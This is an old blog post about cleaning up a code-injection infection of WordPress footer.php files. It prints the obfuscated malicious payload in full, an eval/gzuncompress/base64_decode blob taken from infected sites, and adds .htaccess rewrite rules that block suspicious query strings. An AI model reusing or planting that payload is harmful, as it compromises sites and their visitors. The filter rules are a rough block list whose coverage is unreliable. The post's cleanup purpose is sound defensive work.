Thursday, December 3, 2015

Remove FOOTER.PHP Code Injection in Wordpress

author photo
Wordpress in the most used software to make and design websites on corporate as well as individual level. Recent news show that it is also the framework which is on the attacks by hackers. Most recently large number of wordpress users are attacked by hackers and even most of them did know that their websites have been infected with attacks of hackers. Websites which were infected, they showed deflect in Google’s SERP (Search Engine Ranking Position). Only analyzing Google Webmaster Tools, users can find if their website is infected by Code Injection. Websites which are infected, there is a change in their URL structure, as shown in Google Webmaster Tools;

www.website.com/index.php?aranovo/2015/wiki/o+que+e+binary+options.pdf
www.website.com/index.php?language/de/virtual-clerk-cash
www.website.com/index.php?AnyotherHackResources

We recently found a code which is used by hackers is under here;

 eval(gzuncompress(base64_decode('eNqFVm1v01YU/it3USXiNg1+iZOmVTZBkxZYaas0aQsYWTfOTeLG8Y3s68ahQryI8dayaQJWpH3aB7qJia1DQhNCk4CNabCNCSa2shXtr+xcu6xJ6MCtbCf33POcc55znxPDwq6L9Ktnfl97sdR0zEXMCHIZZqbRpz//7vTq5sju/r0WpWXbtBfwMNqPLNOoozb1HESwY9ESiSFsl5Fnl2n4dQszoxbv3x26QRXPNphJbaRfuPnV7TurP/x4Ltqn3zrz853HwpJZib7jEqsyPLwFJwyHH/XNlx/cfBEVAH4GO7gmpSsGwDfgiiFax20AIHbZrIw4hHmOjfZiN5dM6Nnc6FQ5F+3yeWQL7qgwcrw3G4brBMJGTWwzF9FKJYaqjmcz065CprCGEXOoZQFcd3k68toKdakLNIMdB7ejEV3zy6omS4m16081f4hEMu92p3SI4FpQVgAzGXKoV+XVixRymq+ks5okS0W/wB+aryY1PyGPRWLgVhEVzS+JJ784++eDG4HX7szcBg6JQqzGKStRynjVIliTJDEvGlm6OAEQyp5jE3a5pUmKJI8taH4ScBKpIjvU8DUpmTysiUm5rElqwjDVhRJskMVFMJb52yzcxNK45WHlIBirhiaJqVprWh7T/FQKz00uHh6HyNV0aZx/oxyag/tQbTILqUjgEzYA1ph9GByKs20Al8FDQszwDD9Z+2fj3GvlmqqhNlQsBllhhiqEWC6qQt5BZvvyPCDIjEcOaSZaGU1Mqdzb7Uunrmg+lq59ef/xa9Wa4bWKvXq0CSEY12oBDUVxdiYsfLI0OzMP1RABQ93LGVFhQQ1i3dR8IwXu8QmgWtIUKfUrECSu78BLg3ecSxsEMYpdFhweAqkA99B+4RGCQxlHE3xlahc868RFJY8xAiuWhUw7tDIcCDeODsKZCCKtAx0qcMIDk+RkYXYsHUauqvV6EObK8tONn26cv6cpsgKhRQ7Y3PAYp3P+QA0MccCqV86Kr+r2aEPz08rL65qcSCz/cpfvAjtljEMVORSAgA9epnlefOAvuS9fDErD95/avAi1kdZX1/jWSAzO4PHto3P1yR+Xzlw/+/BvkIQTH3/z7PzK189OCkt9+kffnv3r2sNbzzOjxbyl7580C6AFRjE/oc8QRqcL0W2TmCiJ6oAopQZFWepuFt79wcHizfJe/+6BQVGReglpQg+FhJSwDX8uFDMmqqLErVPJ3vaLoRbvPOyQwH2V2jZGoH0tk9UAh7oEgAbRoNgDVCUMAUaTYNtjQO90+IIqDm3APo5uWU3s1AEeNosJnq8T5Ds1zTrzjZo2E/JToLjRdFpNxtWB8CGEK6Agk9moGJfV7tC3AHkZ+OL2TRBGgirP5HorGyLRIiCpYm9C7xMbjTtmpULa6IAT50LGr/DcDHB7IdbJ6siox9PJFWjz9XTCoBVFSceV/66Bt3wWYuHkgnGxPVsi+vOVNTiK6tMPI0Lv/JjrpI5hq851Hpeox7ujT39w+vL6uc0n1z7PGJ5j6WQ+N9oRqdA7C3c1kNskNotBFy14jSa0QcuG48loQCjwCaXhp9ht0GCUVDADDeZjp+bQFmi9UXcRRMStDcx4540WAdiYgDbqQg6nXEeEPYkVaqaL4N9lXtPkYni8T1/9bfnTlUzHGduxWt+va7Io8inC9SsixIElMmnQMtnZPpRlId4HVOZnc/kjO1ppcpJPPfXUlc8CxRWOvmXDJuhlqKAXAvm8x4cbbBPi/+NfSizDaIVhVR4CSQONAV0uKxAYFJDHn+UFfBPio43LIGs+TsBYhrlmGHffAOcPSZsX7/OYVkEJk7yziFGjPWOEUZugUWqV4ZUsErTHc+GXBKqai6DgjS3ZLxHixHm3Bfz09NQc5nIy5xCXWaTDIbTnvwjCiFc=')));  

By removing the code from their footer.php and other files of wordpress, users can make their website safe can may be able to get their SERP back. However fixing not only footer.php will be enough. Users need to rewrite their .htaccess file and put the code given below which will strip those requests which are caused for URL injection. Code to implement in .htaccess is below;

 <IfModule mod_rewrite.c>  
 RewriteEngine On  
 RewriteBase /  
 RewriteCond %{REQUEST_METHOD} ^(HEAD|TRACE|DELETE|TRACK) [NC]  
 RewriteRule ^(.*)$ - [F,L]  
 RewriteCond %{QUERY_STRING} \.\.\/ [NC,OR]  
 RewriteCond %{QUERY_STRING} boot\.ini [NC,OR]  
 RewriteCond %{QUERY_STRING} tag\= [NC,OR]  
 RewriteCond %{QUERY_STRING} ftp\: [NC,OR]  
 RewriteCond %{QUERY_STRING} http\: [NC,OR]  
 RewriteCond %{QUERY_STRING} https\: [NC,OR]  
 RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]  
 RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|%3D) [NC,OR]  
 RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [NC,OR]  
 RewriteCond %{QUERY_STRING} ^.*(\[|\]|\(|\)|<|>|ê|"|;|\?|\*|=$).* [NC,OR]  
 RewriteCond %{QUERY_STRING} ^.*(&#x22;|&#x27;|&#x3C;|&#x3E;|&#x5C;|&#x7B;|&#x7C;).* [NC,OR]  
 RewriteCond %{QUERY_STRING} ^.*(%24&x).* [NC,OR]  
 RewriteCond %{QUERY_STRING} ^.*(%0|%A|%B|%C|%D|%E|%F|127\.0).* [NC,OR]  
 RewriteCond %{QUERY_STRING} ^.*(globals|encode|localhost|loopback).* [NC,OR]  
 RewriteCond %{QUERY_STRING} ^.*(request|select|insert|union|declare).* [NC]  
 RewriteCond %{HTTP_COOKIE} !^.*wordpress_logged_in_.*$  
 RewriteRule ^(.*)$ - [F,L]  
 </IfModule>  

This post have 0 comments


EmoticonEmoticon

Next article Next Post
Previous article Previous Post